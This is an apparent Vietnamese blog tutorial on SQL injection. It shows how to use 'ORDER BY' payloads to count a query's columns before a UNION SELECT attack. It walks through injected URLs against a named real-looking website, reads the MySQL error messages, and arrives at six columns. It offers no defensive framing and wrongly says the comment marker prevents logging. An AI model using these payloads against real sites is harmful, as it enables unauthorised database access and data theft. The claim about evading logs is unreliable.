-Làm tiết kiệm thời gian attack
-Nó được sử dụng để tính số field ,column có trong CSDL SQL
Các trường hợp order by các bạn nên lưu ý khi gặp:
Đầu tiên ta order by 100-- - để phát hiện ra order của mình đã đi đúng hướng hay chưa, để xem nó rơi vào trường hợp nào dưới đây:
+Nếu site trả về trang lỗi:
Quote:
| Error: Unknown column '100' in 'order clause' |
Quote:
| You have an
error in your SQL syntax; check the manual that corresponds to your
MySQL server version for the right syntax to use near ''' at line 1 ....v..v |
>>>ta đã order theo hướng đúng
>>thuộc TH1
+Nếu site trả về trang web bình thường
>>thuộc TH2,TH3
TH1: order by 100-- -
Victim : TH2: ' order by 100-- -
Victim: TH3: 'order by 100-- a
Victim: TH4:Khác- không order by được ta chuyển sang union select lun
Ghi chú:
-- : Hiểu đơn giản là tránh bị ghi log
- : Biến đoạn đằng sau dấu - thành chú thích
Demo 1 ví dụ:
http://violetqb.com/home/index.php?page=rules&id=2
http://violetqb.com/home/index.php?page=rules&id=2 order by 100-- - >>lỗi
Quote:
| Error: Unknown column '100' in 'order clause' |
Quote:
| http://violetqb.com/home/index.php?page=rules&id=2 order by 10-- - >>vẫn lỗi |
Quote:
| http://violetqb.com/home/index.php?page=rules&id=2 order by 7-- - >>vẫn lỗi |
Quote:
| http://violetqb.com/home/index.php?page=rules&id=2 order by 6-- - >> hết lỗi- nó đưa về trang web như bình thường |
>>ta chú ý giữa ranh giới bị lỗi và không bị lỗi là 6 và 7
Lấy số lỗi là 7-1=6 để đưa vào union select 1,2,3,4,5,6-- -
Hoặc
Lấy số không lỗi là 6 để đưa vào union select 1,2,3,4,5,6-- -
Không có nhận xét nào:
Đăng nhận xét